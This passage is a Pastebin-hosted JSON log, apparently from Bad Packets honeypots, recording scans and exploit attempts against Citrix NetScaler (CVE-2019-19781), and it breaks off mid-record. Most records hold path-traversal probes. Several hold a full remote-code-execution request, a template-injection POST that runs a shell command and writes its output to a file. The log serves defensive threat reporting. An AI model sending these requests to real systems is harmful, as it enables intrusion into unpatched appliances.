API tools faq
paste
internetweather

CVE-2019-19781 scans detected by Bad Packets – last 24 hours

internetweather
Jan 16th, 2020
2,098
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 36.74 KB | None | 0 0
raw download clone embed print report
  1. {
  2.   "count": 58,
  3.   "next": null,
  4.   "previous": null,
  5.   "results": [
  6.     {
  7.       "source_ip_address": "45.148.10.184",
  8.       "country": "NL",
  9.       "user_agent": "Mozilla/5.0 zgrab/0.x",
  10.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  11.       "post_data": "",
  12.       "target_port": 443,
  13.       "protocol": "tcp",
  14.       "tags": [
  15.         {
  16.           "cve": "CVE-2019-19781",
  17.           "category": "Platform",
  18.           "description": "Citrix NetScaler Gateway Exploit"
  19.         }
  20.       ],
  21.       "event_count": 25,
  22.       "first_seen": "2020-01-16T04:12:45Z",
  23.       "last_seen": "2020-01-17T03:48:33Z"
  24.     },
  25.     {
  26.       "source_ip_address": "5.101.0.209",
  27.       "country": "RU",
  28.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  29.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  30.       "post_data": "",
  31.       "target_port": 443,
  32.       "protocol": "tcp",
  33.       "tags": [
  34.         {
  35.           "cve": "CVE-2019-19781",
  36.           "category": "Platform",
  37.           "description": "Citrix NetScaler Gateway Exploit"
  38.         }
  39.       ],
  40.       "event_count": 1813,
  41.       "first_seen": "2020-01-12T12:16:24Z",
  42.       "last_seen": "2020-01-17T02:42:38Z"
  43.     },
  44.     {
  45.       "source_ip_address": "74.63.222.154",
  46.       "country": "US",
  47.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  48.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  49.       "post_data": "",
  50.       "target_port": 80,
  51.       "protocol": "tcp",
  52.       "tags": [
  53.         {
  54.           "cve": "CVE-2019-19781",
  55.           "category": "Platform",
  56.           "description": "Citrix NetScaler Gateway Exploit"
  57.         }
  58.       ],
  59.       "event_count": 9,
  60.       "first_seen": "2020-01-15T19:59:58Z",
  61.       "last_seen": "2020-01-17T02:39:53Z"
  62.     },
  63.     {
  64.       "source_ip_address": "71.6.202.253",
  65.       "country": "US",
  66.       "user_agent": "Research Only, don't at me greynoise",
  67.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  68.       "post_data": "",
  69.       "target_port": 443,
  70.       "protocol": "tcp",
  71.       "tags": [
  72.         {
  73.           "cve": "CVE-2019-19781",
  74.           "category": "Platform",
  75.           "description": "Citrix NetScaler Gateway Scan"
  76.         }
  77.       ],
  78.       "event_count": 42,
  79.       "first_seen": "2020-01-16T21:49:29Z",
  80.       "last_seen": "2020-01-17T01:10:46Z"
  81.     },
  82.     {
  83.       "source_ip_address": "69.162.68.54",
  84.       "country": "US",
  85.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  86.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  87.       "post_data": "",
  88.       "target_port": 443,
  89.       "protocol": "tcp",
  90.       "tags": [
  91.         {
  92.           "cve": "CVE-2019-19781",
  93.           "category": "Platform",
  94.           "description": "Citrix NetScaler Gateway Exploit"
  95.         }
  96.       ],
  97.       "event_count": 1,
  98.       "first_seen": "2020-01-17T00:55:44Z",
  99.       "last_seen": "2020-01-17T00:55:44Z"
  100.     },
  101.     {
  102.       "source_ip_address": "69.162.106.70",
  103.       "country": "US",
  104.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  105.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  106.       "post_data": "",
  107.       "target_port": 443,
  108.       "protocol": "tcp",
  109.       "tags": [
  110.         {
  111.           "cve": "CVE-2019-19781",
  112.           "category": "Platform",
  113.           "description": "Citrix NetScaler Gateway Exploit"
  114.         }
  115.       ],
  116.       "event_count": 1,
  117.       "first_seen": "2020-01-16T18:17:13Z",
  118.       "last_seen": "2020-01-16T18:17:13Z"
  119.     },
  120.     {
  121.       "source_ip_address": "69.162.106.70",
  122.       "country": "US",
  123.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  124.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  125.       "post_data": "",
  126.       "target_port": 80,
  127.       "protocol": "tcp",
  128.       "tags": [
  129.         {
  130.           "cve": "CVE-2019-19781",
  131.           "category": "Platform",
  132.           "description": "Citrix NetScaler Gateway Exploit"
  133.         }
  134.       ],
  135.       "event_count": 4,
  136.       "first_seen": "2020-01-16T17:04:57Z",
  137.       "last_seen": "2020-01-16T17:04:57Z"
  138.     },
  139.     {
  140.       "source_ip_address": "74.63.213.118",
  141.       "country": "US",
  142.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  143.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  144.       "post_data": "",
  145.       "target_port": 80,
  146.       "protocol": "tcp",
  147.       "tags": [
  148.         {
  149.           "cve": "CVE-2019-19781",
  150.           "category": "Platform",
  151.           "description": "Citrix NetScaler Gateway Exploit"
  152.         }
  153.       ],
  154.       "event_count": 1,
  155.       "first_seen": "2020-01-16T16:08:47Z",
  156.       "last_seen": "2020-01-16T16:08:47Z"
  157.     },
  158.     {
  159.       "source_ip_address": "74.63.246.42",
  160.       "country": "US",
  161.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  162.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  163.       "post_data": "",
  164.       "target_port": 80,
  165.       "protocol": "tcp",
  166.       "tags": [
  167.         {
  168.           "cve": "CVE-2019-19781",
  169.           "category": "Platform",
  170.           "description": "Citrix NetScaler Gateway Exploit"
  171.         }
  172.       ],
  173.       "event_count": 59,
  174.       "first_seen": "2020-01-16T14:25:02Z",
  175.       "last_seen": "2020-01-16T14:25:02Z"
  176.     },
  177.     {
  178.       "source_ip_address": "216.144.247.254",
  179.       "country": "US",
  180.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  181.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  182.       "post_data": "",
  183.       "target_port": 443,
  184.       "protocol": "tcp",
  185.       "tags": [
  186.         {
  187.           "cve": "CVE-2019-19781",
  188.           "category": "Platform",
  189.           "description": "Citrix NetScaler Gateway Exploit"
  190.         }
  191.       ],
  192.       "event_count": 5,
  193.       "first_seen": "2020-01-16T11:53:54Z",
  194.       "last_seen": "2020-01-16T13:34:10Z"
  195.     },
  196.     {
  197.       "source_ip_address": "63.143.57.26",
  198.       "country": "US",
  199.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  200.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  201.       "post_data": "",
  202.       "target_port": 80,
  203.       "protocol": "tcp",
  204.       "tags": [
  205.         {
  206.           "cve": "CVE-2019-19781",
  207.           "category": "Platform",
  208.           "description": "Citrix NetScaler Gateway Exploit"
  209.         }
  210.       ],
  211.       "event_count": 1,
  212.       "first_seen": "2020-01-16T13:02:18Z",
  213.       "last_seen": "2020-01-16T13:02:18Z"
  214.     },
  215.     {
  216.       "source_ip_address": "69.162.126.62",
  217.       "country": "US",
  218.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  219.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  220.       "post_data": "",
  221.       "target_port": 443,
  222.       "protocol": "tcp",
  223.       "tags": [
  224.         {
  225.           "cve": "CVE-2019-19781",
  226.           "category": "Platform",
  227.           "description": "Citrix NetScaler Gateway Exploit"
  228.         }
  229.       ],
  230.       "event_count": 4,
  231.       "first_seen": "2020-01-16T10:41:33Z",
  232.       "last_seen": "2020-01-16T10:41:33Z"
  233.     },
  234.     {
  235.       "source_ip_address": "63.143.53.142",
  236.       "country": "US",
  237.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  238.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  239.       "post_data": "",
  240.       "target_port": 443,
  241.       "protocol": "tcp",
  242.       "tags": [
  243.         {
  244.           "cve": "CVE-2019-19781",
  245.           "category": "Platform",
  246.           "description": "Citrix NetScaler Gateway Exploit"
  247.         }
  248.       ],
  249.       "event_count": 2,
  250.       "first_seen": "2020-01-16T10:08:55Z",
  251.       "last_seen": "2020-01-16T10:08:55Z"
  252.     },
  253.     {
  254.       "source_ip_address": "216.245.216.22",
  255.       "country": "US",
  256.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  257.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  258.       "post_data": "",
  259.       "target_port": 80,
  260.       "protocol": "tcp",
  261.       "tags": [
  262.         {
  263.           "cve": "CVE-2019-19781",
  264.           "category": "Platform",
  265.           "description": "Citrix NetScaler Gateway Exploit"
  266.         }
  267.       ],
  268.       "event_count": 85,
  269.       "first_seen": "2020-01-16T10:02:30Z",
  270.       "last_seen": "2020-01-16T10:02:30Z"
  271.     },
  272.     {
  273.       "source_ip_address": "69.162.68.54",
  274.       "country": "US",
  275.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  276.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  277.       "post_data": "",
  278.       "target_port": 80,
  279.       "protocol": "tcp",
  280.       "tags": [
  281.         {
  282.           "cve": "CVE-2019-19781",
  283.           "category": "Platform",
  284.           "description": "Citrix NetScaler Gateway Exploit"
  285.         }
  286.       ],
  287.       "event_count": 1,
  288.       "first_seen": "2020-01-16T06:49:38Z",
  289.       "last_seen": "2020-01-16T06:49:38Z"
  290.     },
  291.     {
  292.       "source_ip_address": "74.63.253.190",
  293.       "country": "US",
  294.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  295.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  296.       "post_data": "",
  297.       "target_port": 443,
  298.       "protocol": "tcp",
  299.       "tags": [
  300.         {
  301.           "cve": "CVE-2019-19781",
  302.           "category": "Platform",
  303.           "description": "Citrix NetScaler Gateway Exploit"
  304.         }
  305.       ],
  306.       "event_count": 1,
  307.       "first_seen": "2020-01-16T05:50:04Z",
  308.       "last_seen": "2020-01-16T05:50:04Z"
  309.     },
  310.     {
  311.       "source_ip_address": "5.101.0.209",
  312.       "country": "RU",
  313.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  314.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  315.       "post_data": "",
  316.       "target_port": 80,
  317.       "protocol": "tcp",
  318.       "tags": [
  319.         {
  320.           "cve": "CVE-2019-19781",
  321.           "category": "Platform",
  322.           "description": "Citrix NetScaler Gateway Exploit"
  323.         }
  324.       ],
  325.       "event_count": 1943,
  326.       "first_seen": "2020-01-12T13:20:04Z",
  327.       "last_seen": "2020-01-16T04:56:29Z"
  328.     },
  329.     {
  330.       "source_ip_address": "107.173.214.153",
  331.       "country": "US",
  332.       "user_agent": "curl/7.67.0",
  333.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  334.       "post_data": "",
  335.       "target_port": 443,
  336.       "protocol": "tcp",
  337.       "tags": [
  338.         {
  339.           "cve": "CVE-2019-19781",
  340.           "category": "Platform",
  341.           "description": "Citrix NetScaler Gateway Exploit"
  342.         }
  343.       ],
  344.       "event_count": 4,
  345.       "first_seen": "2020-01-16T01:10:53Z",
  346.       "last_seen": "2020-01-16T01:10:53Z"
  347.     },
  348.     {
  349.       "source_ip_address": "74.63.192.130",
  350.       "country": "US",
  351.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  352.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  353.       "post_data": "",
  354.       "target_port": 80,
  355.       "protocol": "tcp",
  356.       "tags": [
  357.         {
  358.           "cve": "CVE-2019-19781",
  359.           "category": "Platform",
  360.           "description": "Citrix NetScaler Gateway Exploit"
  361.         }
  362.       ],
  363.       "event_count": 1,
  364.       "first_seen": "2020-01-15T20:44:38Z",
  365.       "last_seen": "2020-01-15T20:44:38Z"
  366.     },
  367.     {
  368.       "source_ip_address": "45.148.10.184",
  369.       "country": "NL",
  370.       "user_agent": "Patch your Citrix !",
  371.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  372.       "post_data": "",
  373.       "target_port": 443,
  374.       "protocol": "tcp",
  375.       "tags": [
  376.         {
  377.           "cve": "CVE-2019-19781",
  378.           "category": "Platform",
  379.           "description": "Citrix NetScaler Gateway Exploit"
  380.         }
  381.       ],
  382.       "event_count": 2,
  383.       "first_seen": "2020-01-15T14:10:59Z",
  384.       "last_seen": "2020-01-15T17:21:47Z"
  385.     },
  386.     {
  387.       "source_ip_address": "69.162.123.62",
  388.       "country": "US",
  389.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  390.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  391.       "post_data": "",
  392.       "target_port": 80,
  393.       "protocol": "tcp",
  394.       "tags": [
  395.         {
  396.           "cve": "CVE-2019-19781",
  397.           "category": "Platform",
  398.           "description": "Citrix NetScaler Gateway Exploit"
  399.         }
  400.       ],
  401.       "event_count": 2,
  402.       "first_seen": "2020-01-15T14:02:38Z",
  403.       "last_seen": "2020-01-15T16:35:25Z"
  404.     },
  405.     {
  406.       "source_ip_address": "83.97.20.145",
  407.       "country": "RO",
  408.       "user_agent": "Patch your Citrix !",
  409.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  410.       "post_data": "",
  411.       "target_port": 443,
  412.       "protocol": "tcp",
  413.       "tags": [
  414.         {
  415.           "cve": "CVE-2019-19781",
  416.           "category": "Platform",
  417.           "description": "Citrix NetScaler Gateway Exploit"
  418.         }
  419.       ],
  420.       "event_count": 123,
  421.       "first_seen": "2020-01-15T03:47:01Z",
  422.       "last_seen": "2020-01-15T10:45:56Z"
  423.     },
  424.     {
  425.       "source_ip_address": "69.162.126.62",
  426.       "country": "US",
  427.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  428.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  429.       "post_data": "",
  430.       "target_port": 80,
  431.       "protocol": "tcp",
  432.       "tags": [
  433.         {
  434.           "cve": "CVE-2019-19781",
  435.           "category": "Platform",
  436.           "description": "Citrix NetScaler Gateway Exploit"
  437.         }
  438.       ],
  439.       "event_count": 1,
  440.       "first_seen": "2020-01-15T10:11:40Z",
  441.       "last_seen": "2020-01-15T10:11:40Z"
  442.     },
  443.     {
  444.       "source_ip_address": "193.57.40.46",
  445.       "country": "UA",
  446.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  447.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  448.       "post_data": "",
  449.       "target_port": 443,
  450.       "protocol": "tcp",
  451.       "tags": [
  452.         {
  453.           "cve": "CVE-2019-19781",
  454.           "category": "Platform",
  455.           "description": "Citrix NetScaler Gateway Exploit"
  456.         }
  457.       ],
  458.       "event_count": 503,
  459.       "first_seen": "2020-01-12T22:25:24Z",
  460.       "last_seen": "2020-01-15T09:22:21Z"
  461.     },
  462.     {
  463.       "source_ip_address": "82.217.91.74",
  464.       "country": "NL",
  465.       "user_agent": "curl/7.67.0",
  466.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  467.       "post_data": "",
  468.       "target_port": 443,
  469.       "protocol": "tcp",
  470.       "tags": [
  471.         {
  472.           "cve": "CVE-2019-19781",
  473.           "category": "Platform",
  474.           "description": "Citrix NetScaler Gateway Exploit"
  475.         }
  476.       ],
  477.       "event_count": 7,
  478.       "first_seen": "2020-01-15T08:01:57Z",
  479.       "last_seen": "2020-01-15T08:50:17Z"
  480.     },
  481.     {
  482.       "source_ip_address": "185.150.9.193",
  483.       "country": "CH",
  484.       "user_agent": "",
  485.       "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
  486.       "post_data": "",
  487.       "target_port": 443,
  488.       "protocol": "tcp",
  489.       "tags": [
  490.         {
  491.           "cve": "CVE-2019-19781",
  492.           "category": "Platform",
  493.           "description": "Citrix NetScaler Gateway Exploit"
  494.         }
  495.       ],
  496.       "event_count": 10,
  497.       "first_seen": "2020-01-15T08:48:34Z",
  498.       "last_seen": "2020-01-15T08:48:34Z"
  499.     },
  500.     {
  501.       "source_ip_address": "185.150.9.193",
  502.       "country": "CH",
  503.       "user_agent": "",
  504.       "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
  505.       "post_data": "",
  506.       "target_port": 80,
  507.       "protocol": "tcp",
  508.       "tags": [
  509.         {
  510.           "cve": "CVE-2019-19781",
  511.           "category": "Platform",
  512.           "description": "Citrix NetScaler Gateway Exploit"
  513.         }
  514.       ],
  515.       "event_count": 10,
  516.       "first_seen": "2020-01-15T08:14:12Z",
  517.       "last_seen": "2020-01-15T08:14:12Z"
  518.     },
  519.     {
  520.       "source_ip_address": "74.63.253.190",
  521.       "country": "US",
  522.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  523.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  524.       "post_data": "",
  525.       "target_port": 80,
  526.       "protocol": "tcp",
  527.       "tags": [
  528.         {
  529.           "cve": "CVE-2019-19781",
  530.           "category": "Platform",
  531.           "description": "Citrix NetScaler Gateway Exploit"
  532.         }
  533.       ],
  534.       "event_count": 1,
  535.       "first_seen": "2020-01-15T03:18:44Z",
  536.       "last_seen": "2020-01-15T03:18:44Z"
  537.     },
  538.     {
  539.       "source_ip_address": "74.63.246.42",
  540.       "country": "US",
  541.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  542.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  543.       "post_data": "",
  544.       "target_port": 443,
  545.       "protocol": "tcp",
  546.       "tags": [
  547.         {
  548.           "cve": "CVE-2019-19781",
  549.           "category": "Platform",
  550.           "description": "Citrix NetScaler Gateway Exploit"
  551.         }
  552.       ],
  553.       "event_count": 6,
  554.       "first_seen": "2020-01-14T23:16:27Z",
  555.       "last_seen": "2020-01-14T23:16:27Z"
  556.     },
  557.     {
  558.       "source_ip_address": "54.38.157.11",
  559.       "country": "DE",
  560.       "user_agent": "curl/7.67.0",
  561.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  562.       "post_data": "",
  563.       "target_port": 443,
  564.       "protocol": "tcp",
  565.       "tags": [
  566.         {
  567.           "cve": "CVE-2019-19781",
  568.           "category": "Platform",
  569.           "description": "Citrix NetScaler Gateway Exploit"
  570.         }
  571.       ],
  572.       "event_count": 47,
  573.       "first_seen": "2020-01-13T03:13:30Z",
  574.       "last_seen": "2020-01-14T15:33:33Z"
  575.     },
  576.     {
  577.       "source_ip_address": "185.234.216.20",
  578.       "country": "IE",
  579.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
  580.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.1",
  581.       "post_data": "",
  582.       "target_port": 443,
  583.       "protocol": "tcp",
  584.       "tags": [
  585.         {
  586.           "cve": "CVE-2019-19781",
  587.           "category": "Platform",
  588.           "description": "Citrix NetScaler Gateway Scan"
  589.         }
  590.       ],
  591.       "event_count": 293,
  592.       "first_seen": "2020-01-11T13:15:51Z",
  593.       "last_seen": "2020-01-14T11:11:44Z"
  594.     },
  595.     {
  596.       "source_ip_address": "185.234.216.20",
  597.       "country": "IE",
  598.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
  599.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  600.       "post_data": "",
  601.       "target_port": 443,
  602.       "protocol": "tcp",
  603.       "tags": [
  604.         {
  605.           "cve": "CVE-2019-19781",
  606.           "category": "Platform",
  607.           "description": "Citrix NetScaler Gateway Exploit"
  608.         }
  609.       ],
  610.       "event_count": 51,
  611.       "first_seen": "2020-01-13T19:01:01Z",
  612.       "last_seen": "2020-01-14T01:27:27Z"
  613.     },
  614.     {
  615.       "source_ip_address": "82.102.16.220",
  616.       "country": "DE",
  617.       "user_agent": "curl/7.58.0",
  618.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  619.       "post_data": "",
  620.       "target_port": 443,
  621.       "protocol": "tcp",
  622.       "tags": [
  623.         {
  624.           "cve": "CVE-2019-19781",
  625.           "category": "Platform",
  626.           "description": "Citrix NetScaler Gateway Exploit"
  627.         }
  628.       ],
  629.       "event_count": 5,
  630.       "first_seen": "2020-01-10T00:07:56Z",
  631.       "last_seen": "2020-01-13T13:16:31Z"
  632.     },
  633.     {
  634.       "source_ip_address": "156.17.191.239",
  635.       "country": "PL",
  636.       "user_agent": "curl/7.52.1",
  637.       "payload": "GET /vpn/../vpns/portal/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml HTTP/1.1",
  638.       "post_data": "",
  639.       "target_port": 2087,
  640.       "protocol": "tcp",
  641.       "tags": [
  642.         {
  643.           "cve": "CVE-2019-19781",
  644.           "category": "Platform",
  645.           "description": "Citrix NetScaler Gateway Exploit"
  646.         }
  647.       ],
  648.       "event_count": 2,
  649.       "first_seen": "2020-01-12T08:45:42Z",
  650.       "last_seen": "2020-01-12T08:45:43Z"
  651.     },
  652.     {
  653.       "source_ip_address": "156.17.191.239",
  654.       "country": "PL",
  655.       "user_agent": "curl/7.52.1",
  656.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  657.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  658.       "target_port": 2087,
  659.       "protocol": "tcp",
  660.       "tags": [
  661.         {
  662.           "cve": "CVE-2019-19781",
  663.           "category": "Platform",
  664.           "description": "Citrix NetScaler Gateway Exploit"
  665.         }
  666.       ],
  667.       "event_count": 1,
  668.       "first_seen": "2020-01-12T08:45:41Z",
  669.       "last_seen": "2020-01-12T08:45:41Z"
  670.     },
  671.     {
  672.       "source_ip_address": "156.17.191.239",
  673.       "country": "PL",
  674.       "user_agent": "curl/7.52.1",
  675.       "payload": "GET /vpn/../vpns/portal/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml HTTP/1.1",
  676.       "post_data": "",
  677.       "target_port": 8443,
  678.       "protocol": "tcp",
  679.       "tags": [
  680.         {
  681.           "cve": "CVE-2019-19781",
  682.           "category": "Platform",
  683.           "description": "Citrix NetScaler Gateway Exploit"
  684.         }
  685.       ],
  686.       "event_count": 2,
  687.       "first_seen": "2020-01-12T08:23:19Z",
  688.       "last_seen": "2020-01-12T08:23:20Z"
  689.     },
  690.     {
  691.       "source_ip_address": "156.17.191.239",
  692.       "country": "PL",
  693.       "user_agent": "curl/7.52.1",
  694.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  695.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  696.       "target_port": 8443,
  697.       "protocol": "tcp",
  698.       "tags": [
  699.         {
  700.           "cve": "CVE-2019-19781",
  701.           "category": "Platform",
  702.           "description": "Citrix NetScaler Gateway Exploit"
  703.         }
  704.       ],
  705.       "event_count": 1,
  706.       "first_seen": "2020-01-12T08:23:19Z",
  707.       "last_seen": "2020-01-12T08:23:19Z"
  708.     },
  709.     {
  710.       "source_ip_address": "156.17.191.239",
  711.       "country": "PL",
  712.       "user_agent": "curl/7.52.1",
  713.       "payload": "GET /vpn/../vpns/portal/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml HTTP/1.1",
  714.       "post_data": "",
  715.       "target_port": 2083,
  716.       "protocol": "tcp",
  717.       "tags": [
  718.         {
  719.           "cve": "CVE-2019-19781",
  720.           "category": "Platform",
  721.           "description": "Citrix NetScaler Gateway Exploit"
  722.         }
  723.       ],
  724.       "event_count": 2,
  725.       "first_seen": "2020-01-12T08:01:34Z",
  726.       "last_seen": "2020-01-12T08:01:35Z"
  727.     },
  728.     {
  729.       "source_ip_address": "156.17.191.239",
  730.       "country": "PL",
  731.       "user_agent": "curl/7.52.1",
  732.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  733.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  734.       "target_port": 2083,
  735.       "protocol": "tcp",
  736.       "tags": [
  737.         {
  738.           "cve": "CVE-2019-19781",
  739.           "category": "Platform",
  740.           "description": "Citrix NetScaler Gateway Exploit"
  741.         }
  742.       ],
  743.       "event_count": 1,
  744.       "first_seen": "2020-01-12T08:01:33Z",
  745.       "last_seen": "2020-01-12T08:01:33Z"
  746.     },
  747.     {
  748.       "source_ip_address": "156.17.191.239",
  749.       "country": "PL",
  750.       "user_agent": "curl/7.52.1",
  751.       "payload": "GET /vpn/../vpns/portal/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml HTTP/1.1",
  752.       "post_data": "",
  753.       "target_port": 443,
  754.       "protocol": "tcp",
